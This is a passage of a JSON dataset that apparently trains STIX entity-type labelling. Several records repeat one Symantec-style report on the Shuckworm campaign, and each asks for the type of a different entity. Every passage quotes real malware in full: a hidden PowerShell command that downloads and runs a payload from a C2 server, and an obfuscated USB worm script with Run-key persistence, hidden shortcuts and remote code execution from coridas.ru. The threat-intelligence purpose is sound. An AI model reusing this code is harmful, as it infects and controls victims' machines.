$env:windir'\\sYSTeM32\\wINDoWSPowErSHEll\\v1.0\\pOwERShell.eXE -WIndowSTYlE hiddEN -noLOgO inVOkE-ExpREsSIOn (get-contEnT $eNV:usERPRoFILe\\INdEX.PHp Out-sTRing) poweRSHeLL -noPROfILE';_\n_coPy-item .\\\"fOtO.safe\" -dEsTInaTioN $Env:USeRprOFIle\\iNdEX.pHp_\n_WHile($CoUNT -lE 2){_\n_$urLs = 'hTTP://'+ [SYSTEM.NEt.DnS]::geThostadDREsSes([String]$(GEt-random)+'.cOriDAS.Ru') +'/slEEP.Php';_\n_iEX $(New-ObJeCt Net.WEBClient).uPloAdStRING($uRls.ToloWER(),'')_\n_$drIVE = GeT-wmIoBJeCt WIN32_VOluME -fILTer \"drIvETYPe='2'\";_\n_$Drive.naMe FOreaCH-oBJecT{_\n_$CHiLdS = GET-ChilDITem $drivE.nAMe_\n_foReach($cHilDs IN $chiLDs)_\n_{_\n_if( [SYsTEM.io.fiLE]::GetAttributES($ChilDS.FuLlnAMe) -eq [SYsTEM.Io.fILeaTTrIbuTES]::DIRecToRy )_\n_{_\n_sET-lnk $chILds.fUlLName_\n_}}_\n_IF(($dRIVe.CapaCITY - $DriVe.fREeSPACE) -Gt 1000000){_\n_SEt-lNK $DRivE.name_\n_}}_\n_STArt-SLEeP -S 300;_\n_}_\nThis PowerShell script is used to copy itself onto the infected machine and then create a shortcut file that links to the PowerShell script. Symantec has identified multiple variants of this script that can be used to indicate successful infection, or to download additional tools onto infected machines.\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nnAMe.LNK\n\n---\n\n### Text Passage:\nTypical Attack Chain\nThe following describes a typical attack chain seen on a victim machine compromised by Shuckworm in this campaign.\nIn one attack, the first sign of malicious activity was when the user appeared to open a RAR archive file that was likely delivered via a spear-phishing email and which contained a malicious document.\nAfter the document was opened, a malicious PowerShell command was observed being executed to download the next-stage payload from the attackers\u2019 C&C server:\n`\"CSIDL_SYSTEM\\cmd.exe\" /c start /min \"\" powershell -w hidden \"$gt='/get.'+char+char+char;$hosta=char;[system.net.servicepointmanager]::servercertificatevalidationcallback={$true};$hosta+='.vafikgo.';$hosta+=char;$hosta+=char;$addrs=[system.net.dns]::gethostbyname($hosta);$addr=$addrs.addresslist[0];$client=(new-object net.webclient);$faddr='htt'+'ps://'+$addr+$gt;$text=$client.downloadstring($faddr);iex $text\"`\nMore recently, Symantec has observed Shuckworm leveraging more IP addresses in their PowerShell scripts. This is likely an attempt to evade some tracking methods employed by researchers.\nShuckworm also continues to update the obfuscation techniques used in its PowerShell scripts in an attempt to avoid detection, with up to 25 new variants of the group\u2019s scripts observed per month between January and April 2023.\nNext, a VBS script, which was Shuckworm\u2019s Pterodo backdoor, was executed:\n* CSIDL_SYSTEM\\wscript.exe CSIDL_PROFILE\\appdata\\local\\temp\\deprive.wow //e:vbscript //b /kmc /fff /cfm /sc4model\nFollowing this, we saw what appeared to be multiple similar scripts being executed. The machine used for this activity appeared to contain multiple confidential documents related to Ukrainian security services or government departments.\nOn a different machine, we saw malicious activity that appeared to be executed from a file (foto.safe) that had been dropped by an infected USB key that someone had plugged into the system. Symantec observed multiple file paths present on infected machines that indicate users had plugged in an infected USB key e.g. \"usb-\u043d\u0430\u043a\u043e\u043f\u0438\u0442\u0435\u043b\u044c\" translates as \"usb-drive\".\nThe foto.safe file is a Base64-encoded script.\nDecoded it looks like the following:\n_fUNCtIon sET-lnK ($chILd) {_\n_$nAMetxt = \"foto.sAfe\".TolowER();_\n_$NAmE = (\"\u043a\u041e\u041c\u041f\u0420\u041e\u041c\u0430\u0442\", \"\u041a\u041e\u0420\u0417\u0438\u041d\u0410\", \"\u0421\u0435\u041a\u0420\u0435\u0442\u043d\u041e\" GeT-rAnDOm).ToUPPeR();_\n_$WSHSHELl = NEw-obJeCT -CoMObjeCT WSCriPT.shELL;_\n_$sHORTcut = $wShShEll.CREatesHoRTCUt($cHild +\"\\$nAMe.LNK\");_\n_$shoRtCuT.iConloCaTiON = \"C:\\wiNDoWS\\SysteM32\\SHELL32.DLL,3\";_\n_$SHOrTcUT.TArGetpAth = \"c:\\wInDOwS\\sYstEm32\\WInDOwSpowERshell\\V1.0\\POwERShEll.ExE\".ToLoweR();_\n_$text = \"-wInDoWsTYlE hidDeN -nolOgo Iex (IeX (GeT-cOnTent .\\$NAMetxt OUT-STrIng))\".TOlower();_\n_$sHORTCUT.ArGUMEnTs = $tExt;_\n_$sHortCUT.saVE();_\n_$mYfIlE= $chIlD+\"\\$naMeTXT\"_\n_cOPY-Item $enV:UsErprOfilE\\iNdEx.phP -deSTINAtION $mYfILE_\n_$FIlE=GEt-ITEM $mYfiLE -forCe_\n_$FiLe.ATtRiButes='hiDDEN'_\n__\n_}_\n_Set-ITemPRoPERTY -pAth HkCU:\\soFTWare\\MicROsOfT\\WiNDows\\cURRENtVerSiON\\ruN -NAME safE -valUE $env:windir'\\sYSTeM32\\wINDoWSPowErSHEll\\v1.0\\pOwERShell.eXE -WIndowSTYlE hiddEN -noLOgO inVOkE-ExpREsSIOn (get-contEnT $eNV:usERPRoFILe\\INdEX.PHp Out-sTRing) poweRSHeLL -noPROfILE';_\n_coPy-item .\\\"fOtO.safe\" -dEsTInaTioN $Env:USeRprOFIle\\iNdEX.pHp_\n_WHile($CoUNT -lE 2){_\n_$urLs = 'hTTP://'+ [SYSTEM.NEt.DnS]::geThostadDREsSes([String]$(GEt-random)+'.cOriDAS.Ru') +'/slEEP.Php';_\n_iEX $(New-ObJeCt Net.WEBClient).uPloAdStRING($uRls.ToloWER(),'')_\n_$drIVE = GeT-wmIoBJeCt WIN32_VOluME -fILTer \"drIvETYPe='2'\";_\n_$Drive.naMe FOreaCH-oBJecT{_\n_$CHiLdS = GET-ChilDITem $drivE.nAMe_\n_foReach($cHilDs IN $chiLDs)_\n_{_\n_if( [SYsTEM.io.fiLE]::GetAttributES($ChilDS.FuLlnAMe) -eq [SYsTEM.Io.fILeaTTrIbuTES]::DIRecToRy )_\n_{_\n_sET-lnk $chILds.fUlLName_\n_}}_\n_IF(($dRIVe.CapaCITY - $DriVe.fREeSPACE) -Gt 1000000){_\n_SEt-lNK $DRivE.name_\n_}}_\n_STArt-SLEeP -S 300;_\n_}_\nThis PowerShell script is used to copy itself onto the infected machine and then create a shortcut file that links to the PowerShell script. Symantec has identified multiple variants of this script that can be used to indicate successful infection, or to download additional tools onto infected machines.\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nPOwERShEll.ExE\n\n---\n\n### Text Passage:\nTypical Attack Chain\nThe following describes a typical attack chain seen on a victim machine compromised by Shuckworm in this campaign.\nIn one attack, the first sign of malicious activity was when the user appeared to open a RAR archive file that was likely delivered via a spear-phishing email and which contained a malicious document.\nAfter the document was opened, a malicious PowerShell command was observed being executed to download the next-stage payload from the attackers\u2019 C&C server:\n`\"CSIDL_SYSTEM\\cmd.exe\" /c start /min \"\" powershell -w hidden \"$gt='/get.'+char+char+char;$hosta=char;[system.net.servicepointmanager]::servercertificatevalidationcallback={$true};$hosta+='.vafikgo.';$hosta+=char;$hosta+=char;$addrs=[system.net.dns]::gethostbyname($hosta);$addr=$addrs.addresslist[0];$client=(new-object net.webclient);$faddr='htt'+'ps://'+$addr+$gt;$text=$client.downloadstring($faddr);iex $text\"`\nMore recently, Symantec has observed Shuckworm leveraging more IP addresses in their PowerShell scripts. This is likely an attempt to evade some tracking methods employed by researchers.\nShuckworm also continues to update the obfuscation techniques used in its PowerShell scripts in an attempt to avoid detection, with up to 25 new variants of the group\u2019s scripts observed per month between January and April 2023.\nNext, a VBS script, which was Shuckworm\u2019s Pterodo backdoor, was executed:\n* CSIDL_SYSTEM\\wscript.exe CSIDL_PROFILE\\appdata\\local\\temp\\deprive.wow //e:vbscript //b /kmc /fff /cfm /sc4model\nFollowing this, we saw what appeared to be multiple similar scripts being executed. The machine used for this activity appeared to contain multiple confidential documents related to Ukrainian security services or government departments.\nOn a different machine, we saw malicious activity that appeared to be executed from a file (foto.safe) that had been dropped by an infected USB key that someone had plugged into the system. Symantec observed multiple file paths present on infected machines that indicate users had plugged in an infected USB key e.g. \"usb-\u043d\u0430\u043a\u043e\u043f\u0438\u0442\u0435\u043b\u044c\" translates as \"usb-drive\".\nThe foto.safe file is a Base64-encoded script.\nDecoded it looks like the following:\n_fUNCtIon sET-lnK ($chILd) {_\n_$nAMetxt = \"foto.sAfe\".TolowER();_\n_$NAmE = (\"\u043a\u041e\u041c\u041f\u0420\u041e\u041c\u0430\u0442\", \"\u041a\u041e\u0420\u0417\u0438\u041d\u0410\", \"\u0421\u0435\u041a\u0420\u0435\u0442\u043d\u041e\" GeT-rAnDOm).ToUPPeR();_\n_$WSHSHELl = NEw-obJeCT -CoMObjeCT WSCriPT.shELL;_\n_$sHORTcut = $wShShEll.CREatesHoRTCUt($cHild +\"\\$nAMe.LNK\");_\n_$shoRtCuT.iConloCaTiON = \"C:\\wiNDoWS\\SysteM32\\SHELL32.DLL,3\";_\n_$SHOrTcUT.TArGetpAth = \"c:\\wInDOwS\\sYstEm32\\WInDOwSpowERshell\\V1.0\\POwERShEll.ExE\".ToLoweR();_\n_$text = \"-wInDoWsTYlE hidDeN -nolOgo Iex (IeX (GeT-cOnTent .\\$NAMetxt OUT-STrIng))\".TOlower();_\n_$sHORTCUT.ArGUMEnTs = $tExt;_\n_$sHortCUT.saVE();_\n_$mYfIlE= $chIlD+\"\\$naMeTXT\"_\n_cOPY-Item $enV:UsErprOfilE\\iNdEx.phP -deSTINAtION $mYfILE_\n_$FIlE=GEt-ITEM $mYfiLE -forCe_\n_$FiLe.ATtRiButes='hiDDEN'_\n__\n_}_\n_Set-ITemPRoPERTY -pAth HkCU:\\soFTWare\\MicROsOfT\\WiNDows\\cURRENtVerSiON\\ruN -NAME safE -valUE $env:windir'\\sYSTeM32\\wINDoWSPowErSHEll\\v1.0\\pOwERShell.eXE -WIndowSTYlE hiddEN -noLOgO inVOkE-ExpREsSIOn (get-contEnT $eNV:usERPRoFILe\\INdEX.PHp Out-sTRing) poweRSHeLL -noPROfILE';_\n_coPy-item .\\\"fOtO.safe\" -dEsTInaTioN $Env:USeRprOFIle\\iNdEX.pHp_\n_WHile($CoUNT -lE 2){_\n_$urLs = 'hTTP://'+ [SYSTEM.NEt.DnS]::geThostadDREsSes([String]$(GEt-random)+'.cOriDAS.Ru') +'/slEEP.Php';_\n_iEX $(New-ObJeCt Net.WEBClient).uPloAdStRING($uRls.ToloWER(),'')_\n_$drIVE = GeT-wmIoBJeCt WIN32_VOluME -fILTer \"drIvETYPe='2'\";_\n_$Drive.naMe FOreaCH-oBJecT{_\n_$CHiLdS = GET-ChilDITem $drivE.nAMe_\n_foReach($cHilDs IN $chiLDs)_\n_{_\n_if( [SYsTEM.io.fiLE]::GetAttributES($ChilDS.FuLlnAMe) -eq [SYsTEM.Io.fILeaTTrIbuTES]::DIRecToRy )_\n_{_\n_sET-lnk $chILds.fUlLName_\n_}}_\n_IF(($dRIVe.CapaCITY - $DriVe.fREeSPACE) -Gt 1000000){_\n_SEt-lNK $DRivE.name_\n_}}_\n_STArt-SLEeP -S 300;_\n_}_\nThis PowerShell script is used to copy itself onto the infected machine and then create a shortcut file that links to the PowerShell script. Symantec has identified multiple variants of this script that can be used to indicate successful infection, or to download additional tools onto infected machines.\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nslEEP.Php\n\n---\n\n### Text Passage:\nTypical Attack Chain\nThe following describes a typical attack chain seen on a victim machine compromised by Shuckworm in this campaign.\nIn one attack, the first sign of malicious activity was when the user appeared to open a RAR archive file that was likely delivered via a spear-phishing email and which contained a malicious document.\nAfter the document was opened, a malicious PowerShell command was observed being executed to download the next-stage payload from the attackers\u2019 C&C server:\n`\"CSIDL_SYSTEM\\cmd.exe\" /c start /min \"\" powershell -w hidden \"$gt='/get.'+char+char+char;$hosta=char;[system.net.servicepointmanager]::servercertificatevalidationcallback={$true};$hosta+='.vafikgo.';$hosta+=char;$hosta+=char;$addrs=[system.net.dns]::gethostbyname($hosta);$addr=$addrs.addresslist[0];$client=(new-object net.webclient);$faddr='htt'+'ps://'+$addr+$gt;$text=$client.downloadstring($faddr);iex $text\"`\nMore recently, Symantec has observed Shuckworm leveraging more IP addresses in their PowerShell scripts. This is likely an attempt to evade some tracking methods employed by researchers.\nShuckworm also continues to update the obfuscation techniques used in its PowerShell scripts in an attempt to avoid detection, with up to 25 new variants of the group\u2019s scripts observed per month between January and April 2023.\nNext, a VBS script, which was Shuckworm\u2019s Pterodo backdoor, was executed:\n* CSIDL_SYSTEM\\wscript.exe CSIDL_PROFILE\\appdata\\local\\temp\\deprive.wow //e:vbscript //b /kmc /fff /cfm /sc4model\nFollowing this, we saw what appeared to be multiple similar scripts being executed. The machine used for this activity appeared to contain multiple confidential documents related to Ukrainian security services or government departments.\nOn a different machine, we saw malicious activity that appeared to be executed from a file (foto.safe) that had been dropped by an infected USB key that someone had plugged into the system. Symantec observed multiple file paths present on infected machines that indicate users had plugged in an infected USB key e.g. \"usb-\u043d\u0430\u043a\u043e\u043f\u0438\u0442\u0435\u043b\u044c\" translates as \"usb-drive\".\nThe foto.safe file is a Base64-encoded script.\nDecoded it looks like the following:\n_fUNCtIon sET-lnK ($chILd) {_\n_$nAMetxt = \"foto.sAfe\".TolowER();_\n_$NAmE = (\"\u043a\u041e\u041c\u041f\u0420\u041e\u041c\u0430\u0442\", \"\u041a\u041e\u0420\u0417\u0438\u041d\u0410\", \"\u0421\u0435\u041a\u0420\u0435\u0442\u043d\u041e\" GeT-rAnDOm).ToUPPeR();_\n_$WSHSHELl = NEw-obJeCT -CoMObjeCT WSCriPT.shELL;_\n_$sHORTcut = $wShShEll.CREatesHoRTCUt($cHild +\"\\$nAMe.LNK\");_\n_$shoRtCuT.iConloCaTiON = \"C:\\wiNDoWS\\SysteM32\\SHELL32.DLL,3\";_\n_$SHOrTcUT.TArGetpAth = \"c:\\wInDOwS\\sYstEm32\\WInDOwSpowERshell\\V1.0\\POwERShEll.ExE\".ToLoweR();_\n_$text = \"-wInDoWsTYlE hidDeN -nolOgo Iex (IeX (GeT-cOnTent .\\$NAMetxt OUT-STrIng))\".TOlower();_\n_$sHORTCUT.ArGUMEnTs = $tExt;_\n_$sHortCUT.saVE();_\n_$mYfIlE= $chIlD+\"\\$naMeTXT\"_\n_cOPY-Item $enV:UsErprOfilE\\iNdEx.phP -deSTINAtION $mYfILE_\n_$FIlE=GEt-ITEM $mYfiLE -forCe_\n_$FiLe.ATtRiButes='hiDDEN'_\n__\n_}_\n_Set-ITemPRoPERTY -pAth HkCU:\\soFTWare\\MicROsOfT\\WiNDows\\cURRENtVerSiON\\ruN -NAME safE -valUE $env:windir'\\sYSTeM32\\wINDoWSPowErSHEll\\v1.0\\pOwERShell.eXE -WIndowSTYlE hiddEN -noLOgO inVOkE-ExpREsSIOn (get-contEnT $eNV:usERPRoFILe\\INdEX.PHp Out-sTRing) poweRSHeLL -noPROfILE';_\n_coPy-item .\\\"fOtO.safe\" -dEsTInaTioN $Env:USeRprOFIle\\iNdEX.pHp_\n_WHile($CoUNT -lE 2){_\n_$urLs = 'hTTP://'+ [SYSTEM.NEt.DnS]::geThostadDREsSes([String]$(GEt-random)+'.cOriDAS.Ru') +'/slEEP.Php';_\n_iEX $(New-ObJeCt Net.WEBClient).uPloAdStRING($uRls.ToloWER(),'')_\n_$drIVE = GeT-wmIoBJeCt WIN32_VOluME -fILTer \"drIvETYPe='2'\";_\n_$Drive.naMe FOreaCH-oBJecT{_\n_$CHiLdS = GET-ChilDITem $drivE.nAMe_\n_foReach($cHilDs IN $chiLDs)_\n_{_\n_if( [SYsTEM.io.fiLE]::GetAttributES($ChilDS.FuLlnAMe) -eq [SYsTEM.Io.fILeaTTrIbuTES]::DIRecToRy )_\n_{_\n_sET-lnk $chILds.fUlLName_\n_}}_\n_IF(($dRIVe.CapaCITY - $DriVe.fREeSPACE) -Gt 1000000){_\n_SEt-lNK $DRivE.name_\n_}}_\n_STArt-SLEeP -S 300;_\n_}_\nThis PowerShell script is used to copy itself onto the infected machine and then create a shortcut file that links to the PowerShell script. Symantec has identified multiple variants of this script that can be used to indicate successful infection, or to download additional tools onto infected machines.\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\npOwERShell.eXE\n\n---\n\n### Text Passage:\nTypical Attack Chain\nThe following describes a typical attack chain seen on a victim machine compromised by Shuckworm in this campaign.\nIn one attack, the first sign of malicious activity was when the user appeared to open a RAR archive file that was likely delivered via a spear-phishing email and which contained a malicious document.\nAfter the document was opened, a malicious PowerShell command was observed being executed to download the next-stage payload from the attackers\u2019 C&C server:\n`\"CSIDL_SYSTEM\\cmd.exe\" /c start /min \"\" powershell -w hidden \"$gt='/get.'+char+char+char;$hosta=char;[system.net.servicepointmanager]::servercertificatevalidationcallback={$true};$hosta+='.vafikgo.';$hosta+=char;$hosta+=char;$addrs=[system.net.dns]::gethostbyname($hosta);$addr=$addrs.addresslist[0];$client=(new-object net.webclient);$faddr='htt'+'ps://'+$addr+$gt;$text=$client.downloadstring($faddr);iex $text\"`\nMore recently, Symantec has observed Shuckworm leveraging more IP addresses in their PowerShell scripts. This is likely an attempt to evade some tracking methods employed by researchers.\nShuckworm also continues to update the obfuscation techniques used in its PowerShell scripts in an attempt to avoid detection, with up to 25 new variants of the group\u2019s scripts observed per month between January and April 2023.\nNext, a VBS script, which was Shuckworm\u2019s Pterodo backdoor, was executed:\n* CSIDL_SYSTEM\\wscript.exe CSIDL_PROFILE\\appdata\\local\\temp\\deprive.wow //e:vbscript //b /kmc /fff /cfm /sc4model\nFollowing this, we saw what appeared to be multiple similar scripts being executed. The machine used for this activity appeared to contain multiple confidential documents related to Ukrainian security services or government departments.\nOn a different machine, we saw malicious activity that appeared to be executed from a file (foto.safe) that had been dropped by an infected USB key that someone had plugged into the system. Symantec observed multiple file paths present on infected machines that indicate users had plugged in an infected USB key e.g. \"usb-\u043d\u0430\u043a\u043e\u043f\u0438\u0442\u0435\u043b\u044c\" translates as \"usb-drive\".\nThe foto.safe file is a Base64-encoded script.\nDecoded it looks like the following:\n_fUNCtIon sET-lnK ($chILd) {_\n_$nAMetxt = \"foto.sAfe\".TolowER();_\n_$NAmE = (\"\u043a\u041e\u041c\u041f\u0420\u041e\u041c\u0430\u0442\", \"\u041a\u041e\u0420\u0417\u0438\u041d\u0410\", \"\u0421\u0435\u041a\u0420\u0435\u0442\u043d\u041e\" GeT-rAnDOm).ToUPPeR();_\n_$WSHSHELl = NEw-obJeCT -CoMObjeCT WSCriPT.shELL;_\n_$sHORTcut = $wShShEll.CREatesHoRTCUt($cHild +\"\\$nAMe.LNK\");_\n_$shoRtCuT.iConloCaTiON = \"C:\\wiNDoWS\\SysteM32\\SHELL32.DLL,3\";_\n_$SHOrTcUT.TArGetpAth = \"c:\\wInDOwS\\sYstEm32\\WInDOwSpowERshell\\V1.0\\POwERShEll.ExE\".ToLoweR();_\n_$text = \"-wInDoWsTYlE hidDeN -nolOgo Iex (IeX (GeT-cOnTent .\\$NAMetxt OUT-STrIng))\".TOlower();_\n_$sHORTCUT.ArGUMEnTs = $tExt;_\n_$sHortCUT.saVE();_\n_$mYfIlE= $chIlD+\"\\$naMeTXT\"_\n_cOPY-Item $enV:UsErprOfilE\\iNdEx.phP -deSTINAtION $mYfILE_\n_$FIlE=GEt-ITEM $mYfiLE -forCe_\n_$FiLe.ATtRiButes='hiDDEN'_\n__\n_}_\n_Set-ITemPRoPERTY -pAth HkCU:\\soFTWare\\MicROsOfT\\WiNDows\\cURRENtVerSiON\\ruN -NAME safE -valUE $env:windir'\\sYSTeM32\\wINDoWSPowErSHEll\\v1.0\\pOwERShell.eXE -WIndowSTYlE hiddEN -noLOgO inVOkE-ExpREsSIOn (get-contEnT $eNV:usERPRoFILe\\INdEX.PHp Out-sTRing) poweRSHeLL -noPROfILE';_\n_coPy-item .\\\"fOtO.safe\" -dEsTInaTioN $Env:USeRprOFIle\\iNdEX.pHp_\n_WHile($CoUNT -lE 2){_\n_$urLs = 'hTTP://'+ [SYSTEM.NEt.DnS]::geThostadDREsSes([String]$(GEt-random)+'.cOriDAS.Ru') +'/slEEP.Php';_\n_iEX $(New-ObJeCt Net.WEBClient).uPloAdStRING($uRls.ToloWER(),'')_\n_$drIVE = GeT-wmIoBJeCt WIN32_VOluME -fILTer \"drIvETYPe='2'\";_\n_$Drive.naMe FOreaCH-oBJecT{_\n_$CHiLdS = GET-ChilDITem $drivE.nAMe_\n_foReach($cHilDs IN $chiLDs)_\n_{_\n_if( [SYsTEM.io.fiLE]::GetAttributES($ChilDS.FuLlnAMe) -eq [SYsTEM.Io.fILeaTTrIbuTES]::DIRecToRy )_\n_{_\n_sET-lnk $chILds.fUlLName_\n_}}_\n_IF(($dRIVe.CapaCITY - $DriVe.fREeSPACE) -Gt 1000000){_\n_SEt-lNK $DRivE.name_\n_}}_\n_STArt-SLEeP -S 300;_\n_}_\nThis PowerShell script is used to copy itself onto the infected machine and then create a shortcut file that links to the PowerShell script. Symantec has identified multiple variants of this script that can be used to indicate successful infection, or to download additional tools onto infected machines.\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
